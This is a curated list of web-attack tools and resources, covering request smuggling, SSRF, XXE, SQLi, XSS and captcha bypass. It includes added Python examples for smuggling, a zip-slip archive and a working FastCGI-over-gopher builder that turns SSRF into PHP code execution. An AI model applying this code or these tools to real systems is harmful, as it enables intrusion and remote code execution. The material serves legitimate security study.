3rd-party lists
- arainho/awesome-api-security - A collection of awesome API Security tools and resources
- irsdl/top10webseclist - Top Ten Web Hacking Techniques List
- GrrrDog/weird_proxies - Reverse proxies cheatsheet
- Application Security Knowledgebase
Uncategorized
- ffuf/ffuf - Fast web fuzzer written in Go
- lobuhi/byp4xx - Simple bash script to bypass "403 Forbidden" messages with well-known methods discussed in #bugbountytips
- rtcatc/Packer-Fuzzer - A fast, efficient security scanner for sites built with Webpack and other front-end bundlers - 2.7K stars
- Alibaba Group Web Security Standard v1.4, released 2015
Pollution
- dwisiswant0/ppfuzz - A fast tool to scan prototype pollution vulnerability written in Rust
- aszx87410/cdnjs-prototype-pollution - Find all libraries on cdn.js that pollute your prototype
Input fuzzing
- musana/fuzzuli - fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain
- Sh1Yo/x8 - Hidden parameters discovery suite
- minimaxir/big-list-of-naughty-strings - a list of strings which have a high probability of causing issues when used as user-input data
- TheKingOfDuck/paramFuzzer - A fast parameter fuzzing tool
- Fuzzing techniques for password-reset endpoints
Inspector API
JWT
HTTP Smuggling
- defparam/smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3
- BishopFox/h2csmuggler - HTTP Request Smuggling over HTTP/2 Cleartext (h2c)
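Added example, not code from smuggler or h2csmuggler: the CL.TE and TE.CL desyncs these tools probe for, shown as one raw request read by two parsers. A front end that honours Content-Length forwards a different number of bytes than a back end that honours Transfer-Encoding: chunked, and whatever is left over becomes the prefix of the next request on that connection. The host name is a placeholder and nothing here touches the network.

```python
"""CL.TE / TE.CL request smuggling: one byte string, two parsers, two boundaries.

Added example, not code from the tools listed above. The host name is a
placeholder; the requests are built and parsed in memory only.
"""


def split_message(raw: bytes) -> tuple[dict, bytes]:
    """Split an HTTP/1.1 message into lower-cased headers and the bytes after the blank line."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:            # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, rest


def body_by_content_length(raw: bytes) -> tuple[bytes, bytes]:
    """Parser that honours Content-Length: (body, bytes left over for the next request)."""
    headers, rest = split_message(raw)
    n = int(headers[b"content-length"])
    return rest[:n], rest[n:]


def body_by_chunked(raw: bytes) -> tuple[bytes, bytes]:
    """Parser that honours Transfer-Encoding: chunked (trailers not handled)."""
    _, rest = split_message(raw)
    body, pos = b"", 0
    while True:
        eol = rest.index(b"\r\n", pos)
        size = int(rest[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            pos += 2                                   # CRLF that closes the 0 chunk
            return body, rest[pos:]
        body += rest[pos:pos + size]
        pos += size + 2                                # chunk data plus its CRLF


def _request(host: str, content_length: int, body: bytes) -> bytes:
    """POST carrying both length headers; which one wins depends on the parser."""
    lines = [
        b"POST / HTTP/1.1",
        b"Host: " + host.encode(),
        b"Content-Length: " + str(content_length).encode(),
        b"Transfer-Encoding: chunked",
        b"",
    ]
    return b"\r\n".join(lines) + b"\r\n" + body


def build_clte_request(host: str, smuggled: bytes) -> bytes:
    """CL.TE: Content-Length covers the terminating chunk and the smuggled bytes.
    A CL front end forwards all of it; a chunked back end stops after '0\\r\\n\\r\\n'
    and sees `smuggled` as the start of the next request."""
    body = b"0\r\n\r\n" + smuggled
    return _request(host, len(body), body)


def build_tecl_request(host: str, smuggled: bytes) -> bytes:
    """TE.CL: Content-Length covers only the chunk-size line. A chunked front end
    consumes the whole chunk; a CL back end stops after the size line and sees
    the chunk data as the next request."""
    size_line = f"{len(smuggled):x}".encode() + b"\r\n"
    body = size_line + smuggled + b"\r\n0\r\n\r\n"
    return _request(host, len(size_line), body)


def leftover_by_each_parser(raw: bytes) -> tuple[bytes, bytes]:
    """(bytes left by the CL parser, bytes left by the chunked parser)."""
    return body_by_content_length(raw)[1], body_by_chunked(raw)[1]


if __name__ == "__main__":
    probe = build_clte_request("target.example", b"GET /admin HTTP/1.1\r\nFoo: x")
    print(leftover_by_each_parser(probe))
```

The disagreement between the two tuples returned by `leftover_by_each_parser` is the whole vulnerability; the timing and differential probes in the listed tools exist to observe that disagreement without being able to see the back end's parse directly.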
ASP.NET
- 0xacb/viewgen - a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
- Illuminopi/RCEvil.NET - a tool for signing malicious ViewStates with a known validationKey. Any (even empty) ASPX page is a valid target
CRLF
SAML
PHP
- hollodotme/fast-cgi-client - A PHP fast CGI client for sending requests (a)synchronously to PHP-FPM
- adoy/PHP-FastCGI-Client - This PHP class handles the communication with a FastCGI (FCGI) application using the FastCGI protocol - unmaintained since 2016
- gist: Fastcgi PHP-FPM Client && Code Execution
Unserialize
SSTI
- GoSecure/template-injection-workshop - This repository includes all the test applications presented at Hackfest 2020
- epinna/tplmap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool
- Nodejs
XXE
- XXE Payloads
- BuffaloWill/oxml_xxe - A tool for embedding XXE/XML exploits into different filetypes
- TheTwitchy/xxer - A blind XXE injection callback handler. Uses HTTP and FTP to extract information
- enjoiz/XXEinjector - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
- GDSSecurity/xxe-recursive-download - exploits XXE to retrieve files from a target server. It obtains directory listings and recursively downloads file contents
- GoSecure/dtd-finder - List DTDs and generate XXE payloads using those local DTDs
- GoSecure/xxe-workshop - Workshop given at Hack in Paris 2019
File upload
- almandin/fuxploider - File upload vulnerability scanner and exploitation tool
- 3xp10it/xupload - A tool for automatically testing whether an upload function will accept a webshell
- c0ny1/upload-fuzz-dic-builder - Script that builds fuzzing wordlists for upload vulnerabilities
- GD
SSRF
- blog.assetnote.io: A Glossary of Blind SSRF Chains - a catalogue of targets worth hitting with blind SSRF
- requestbin: A modern request bin to inspect any event - useful for confirming SSRF callbacks
- swisskyrepo/SSRFmap - Automatic SSRF fuzzer and exploitation tool
- tarunkant/Gopherus - This tool generates gopher links for exploiting SSRF and gaining RCE in various servers - 1K stars; supports db/fastcgi/zabbix/smtp and a range of other targets
- bcoles/ssrf_proxy - facilitates tunneling HTTP communications through servers vulnerable to Server-Side Request Forgery
- iamultra/ssrfsocks - Creates a SOCKS proxy server that transmits data over an SSRF vulnerability
- D4Vinci/Cuteit - Make a malicious ip a bit cuter
- random-robbie/ssrf-finder - Pass list of urls with FUZZ in and it will check if it has found a potential SSRF
- cujanovic/SSRF-Testing - SSRF (Server Side Request Forgery) testing resources
- jmdx/TLS-poison - A tool that allows for generic SSRF via TLS, as well as CSRF via image tags in most browsers
- assetnote/blind-ssrf-chains - An exhaustive list of all the possible ways you can chain your Blind SSRF vulnerability
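Added example, not code from Gopherus or from the FastCGI clients listed under PHP above, covering both: it encodes a FastCGI request for PHP-FPM by hand (the protocol those clients speak) and wraps the raw bytes in a gopher:// URL (what Gopherus emits) so an SSRF sink that accepts gopher will replay them onto the FPM socket. The PHP_VALUE/PHP_ADMIN_VALUE pair is the well-known trick that makes FPM prepend php://input, i.e. the request body, to an existing script. Assumptions: PHP-FPM listens on TCP (127.0.0.1:9000 is the default), the path in SCRIPT_FILENAME exists on the FPM host, and the SSRF sink honours gopher://.

```python
"""Hand-rolled FastCGI request for PHP-FPM, wrapped in a gopher:// URL.

Added example, not code from Gopherus or the FastCGI clients listed above.
Assumes PHP-FPM is reachable over TCP from the SSRF sink and that
SCRIPT_FILENAME points at a file that exists on the FPM host.
"""
import struct
from urllib.parse import quote, unquote_to_bytes

FCGI_VERSION = 1
FCGI_BEGIN_REQUEST = 1
FCGI_PARAMS = 4
FCGI_STDIN = 5
FCGI_RESPONDER = 1


def fcgi_record(rec_type: int, body: bytes, request_id: int = 1) -> bytes:
    """One record: version, type, requestId, contentLength, paddingLength, reserved,
    then the body padded with NULs to a multiple of 8 bytes."""
    padding = (-len(body)) % 8
    header = struct.pack(">BBHHBx", FCGI_VERSION, rec_type, request_id, len(body), padding)
    return header + body + b"\x00" * padding


def fcgi_name_value(name: bytes, value: bytes) -> bytes:
    """FCGI_PARAMS pair: each length is 1 byte if < 128, else 4 bytes with the high bit set."""
    def enc_len(n: int) -> bytes:
        return bytes([n]) if n < 128 else struct.pack(">I", n | 0x80000000)
    return enc_len(len(name)) + enc_len(len(value)) + name + value


def build_fcgi_request(script: str, php_code: bytes, request_id: int = 1) -> bytes:
    """BEGIN_REQUEST, PARAMS, empty PARAMS, STDIN, empty STDIN.
    A PARAMS body over 65535 bytes would have to be split across records; this one is small."""
    params = {
        b"GATEWAY_INTERFACE": b"FastCGI/1.0",
        b"REQUEST_METHOD": b"POST",
        b"SCRIPT_FILENAME": script.encode(),
        b"SCRIPT_NAME": script.encode(),
        b"REQUEST_URI": script.encode(),
        b"SERVER_SOFTWARE": b"php/fcgiclient",
        b"REMOTE_ADDR": b"127.0.0.1",
        b"SERVER_NAME": b"localhost",
        b"SERVER_PROTOCOL": b"HTTP/1.1",
        b"CONTENT_TYPE": b"application/x-www-form-urlencoded",
        b"CONTENT_LENGTH": str(len(php_code)).encode(),
        # These two turn "run an existing script" into "run the STDIN body":
        # FPM prepends php://input to the script, and allow_url_include lets it.
        b"PHP_VALUE": b"auto_prepend_file = php://input",
        b"PHP_ADMIN_VALUE": b"allow_url_include = On",
    }
    begin_body = struct.pack(">HB5x", FCGI_RESPONDER, 0)   # role, flags, reserved
    out = fcgi_record(FCGI_BEGIN_REQUEST, begin_body, request_id)
    out += fcgi_record(FCGI_PARAMS, b"".join(fcgi_name_value(k, v) for k, v in params.items()), request_id)
    out += fcgi_record(FCGI_PARAMS, b"", request_id)   # empty record terminates PARAMS
    out += fcgi_record(FCGI_STDIN, php_code, request_id)
    out += fcgi_record(FCGI_STDIN, b"", request_id)    # empty record terminates STDIN
    return out


def to_gopher_url(host: str, port: int, payload: bytes) -> str:
    """gopher://host:port/_<percent-encoded bytes>. The '_' is the gopher item-type
    byte the client strips, so exactly `payload` is written to the socket."""
    return f"gopher://{host}:{port}/_" + quote(payload, safe="")


def gopher_payload(url: str) -> bytes:
    """Inverse of to_gopher_url: the bytes that will actually reach the socket."""
    _, _, encoded = url.partition("/_")
    return unquote_to_bytes(encoded)


if __name__ == "__main__":
    # Constructed sample: a benign marker script rather than a real payload.
    req = build_fcgi_request("/usr/share/php/PEAR.php", b"<?php echo 'fcgi-ok'; ?>")
    print(to_gopher_url("127.0.0.1", 9000, req))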
SQLi
- FSecureLABS/N1QLMap - The tool exfiltrates data from Couchbase database by exploiting N1QL injection vulnerabilities
- stamparm/DSSS - Damn Small SQLi Scanner
- WhitewidowScanner/whitewidow - SQL Vulnerability Scanner
- Coalfire-Research/sqlinator - Automatically forward HTTP GET & POST requests to SQLMap's API to test for SQLi
- 0x3curity/TheDoc - a simple but very useful SQLMAP automator with built-in admin finder, hash cracker (using hashcat) and more!
- jesuiscamille/AutoSQLi - An automatic SQL Injection tool which takes advantage of DorkNet, Googler, Ddgr, WhatWaf and sqlmap
- ron190/jsql-injection - a Java application for automatic SQL database injection
- Xib3rR4dAr/filter-var-sqli - Bypassing FILTER_SANITIZE_EMAIL & FILTER_VALIDATE_EMAIL filters in filter_var for SQL Injection
- ptsecurity: Advanced MSSQL Injection Tricks
- CaledoniaProject/SQli-Gods-Syntax-V1.0-archive
CMDi
- commixproject/commix - Automated All-in-One OS command injection and exploitation tool
- ewilded/shelling - SHELLING - a comprehensive OS command injection payload generator
Directory Traversal
- ptoomey3/evilarc - Create tar/zip archives that can exploit directory traversal vulnerabilities
- jcesarstef/dotdotslash - A tool to help you search for Directory Traversal Vulnerabilities
- D35m0nd142/LFISuite - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
- lijiejie/idea_exploit - Gather sensitive information from (.idea) folder for pentesters
- nccgroup/dirble - Fast directory scanning and scraping tool
- LandGrey/ClassHound - Uses an arbitrary file download vulnerability to download and decompile .class files in a loop, recovering the site's source code
- mazen160/bfac - BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code
- 7kbstorm/7kbscan-WebPathBrute - Web path brute-forcing tool - mainly of interest for its wordlists
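Added example, not code from evilarc: the archive-side of the traversal it generates (an entry named `../../target`) next to the check a hardened extractor should run before writing anything. Python's own `ZipFile.extractall()` strips leading `..` components, so the vulnerable side here is a naive loop that trusts the entry name, which is how many hand-written extractors behave. The temp directory and file names are constructed for the demo.

```python
"""Zip slip: craft an entry that escapes the extraction directory, then detect it.

Added example, not code from evilarc. Python's ZipFile.extractall() sanitises
names on extraction, so the vulnerable path is the naive writer below.
"""
import io
import os
import tempfile
import zipfile


def make_traversal_zip(depth: int, target: str, content: bytes) -> bytes:
    """Archive with one entry named '../' * depth + target (what evilarc produces)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("../" * depth + target, content)
    return buf.getvalue()


def naive_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Vulnerable: joins the archive's name onto dest and writes wherever it lands."""
    written = []
    os.makedirs(dest, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            path = os.path.join(dest, info.filename)      # trusts the entry name
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(path))
    return written


def escaping_members(zip_bytes: bytes, dest: str) -> list[str]:
    """Entry names that resolve outside dest: catches '..' segments and absolute names."""
    root = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            resolved = os.path.realpath(os.path.join(root, info.filename))
            if os.path.commonpath([root, resolved]) != root:
                bad.append(info.filename)
    return bad


def safe_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Hardened: refuse the whole archive if any member escapes, else extract."""
    bad = escaping_members(zip_bytes, dest)
    if bad:
        raise ValueError(f"refusing archive, members escape {dest}: {bad}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return [os.path.join(dest, i.filename) for i in zf.infolist()]


def demo() -> dict:
    """Constructed run in a fresh temp dir: where the naive extractor wrote the
    file, whether that is outside dest, what the check flags, and whether the
    hardened extractor refused the archive."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="zipslip-"))
    dest = os.path.join(root, "uploads")
    evil = make_traversal_zip(1, "escaped.txt", b"owned")
    landed = naive_extract(evil, dest)[0]
    try:
        safe_extract(evil, dest)
        refused = False
    except ValueError:
        refused = True
    return {
        "root": root,
        "landed": landed,
        "landed_outside_dest": os.path.commonpath([dest, landed]) != dest,
        "flagged": escaping_members(evil, dest),
        "refused": refused,
    }


if __name__ == "__main__":
    print(demo())
```

The check resolves each name against the real extraction root and compares with `commonpath` rather than a string prefix, so `uploads-evil/x` is not mistaken for a child of `uploads`; absolute entry names are caught for free because `os.path.join` discards the root when the second argument is absolute.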
CSP
JSONP
XSS
- doyensec/awesome-electronjs-hacking - A curated list of awesome resources about Electron.js (in)security
- RenwaX23/XSSTRON - Electron JS Browser To Find XSS Vulnerabilities Automatically - fuzzes by creating multiple webviews; RCE comes up easily in this setup
- filedescriptor/untrusted-types - Untrusted Types is a Chrome extension that abuses Trusted Types to log DOMXSS sinks - Trusted Types now has a W3C spec; enables JS taint tracking
- hahwul/dalfox - Parameter Analysis and XSS Scanning tool based on golang
- shelld3v/JSshell - A JavaScript reverse shell for exploiting XSS remotely or finding blind XSS, working with both Unix and Windows OS
- heroanswer/XSS_Cheat_Sheet_2020_Edition - the best collection of XSS fuzzing payloads, 2020 edition
- Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing
- twitter: itscachemoney - ways to alert
- Metnew/uxss-db - Universal Cross-site Scripting DB [+ other browser vulnerabilities]
- ismailtasdelen/xss-payload-list - Cross Site Scripting ( XSS ) Vulnerability Payload List
- aurainfosec/xss_payloads - XSS payloads for edge cases
- nettitude/xss_payloads - Exploitation for XSS
- masatokinugawa/filterbypass - Browser's XSS Filter Bypass Cheat Sheet
- xsleaks/xsleaks - cross origin leaks
- ardern.io: Advanced Blind XSS Payloads
- s0md3v/AwesomeXSS - Awesome XSS stuff
- koto/xsschef - Chrome extension Exploitation Framework
- riusksk/FlashScanner - Flash XSS Scanner
- s0md3v/XSStrike - Most advanced XSS detection suite
- ssl/ezXSS - ezXSS is an easy way to test (blind) XSS
- LewisArdern/bXSS - a simple Blind XSS application adapted from https://cure53.de/m
- mandatoryprogrammer/xsshunter - The XSS Hunter service - a portable version of XSSHunter.com
- faizann24/XssPy - Web Application XSS Scanner
- ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework - an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework - combines multiple browser engines
- raz-varren/xsshell - An XSS reverse shell framework
- beefproject/beef - The Browser Exploitation Framework Project
- mandatoryprogrammer/sonar.js - A framework for identifying and launching exploits against internal network hosts. Works via WebRTC IP enumeration combined with WebSockets and external resource fingerprinting
- Firing Range - URL-based DOM XSS vulnerabilities - DOM XSS test cases
- seebug: How an XSS scanner grew up (XSS 扫描器成长记)
- Chrome plugins
- doyensec/StandardizedImageProcessingTest - A test suite built with Mocha/Chai to test for behavioral differences between image libraries for the web
Captcha
- sarperavci/GoogleRecaptchaBypass - Solve Google reCAPTCHA in less than 5 seconds
- kerlomz/captcha_trainer - [Captcha recognition - training] This project is based on CNN/ResNet/DenseNet+GRU/LSTM+CTC/CrossEntropy to realize verification code identification. This project is only for training the model - the muggle_ocr package has been removed from PyPI
- sml2h3/ddddocr - ddddocr ("带带弟弟") - general-purpose captcha recognition OCR, PyPI release
- ecthros/uncaptcha2 - defeating the latest version of ReCaptcha with 91% accuracy - unmaintained since 2019
- huaiyukeji/verification_code - Notes from researching and breaking captchas. Covers mainstream captchas including NetEase Yidun, Alibaba Cloud captcha and Geetest, and captcha types including click-to-press, click-select and word-order click-select. Updated with notes on Geetest and on scraping the enterprise public disclosure site (企业公示网).
- medium.com: How to bypass reCAPTCHA v3 with Selenium (Python) - https://medium.com/analytics-vidhya/how-to-bypass-recaptcha-v3-with-selenium-python-7e71c1b680fc
Race conditions
Padding Oracle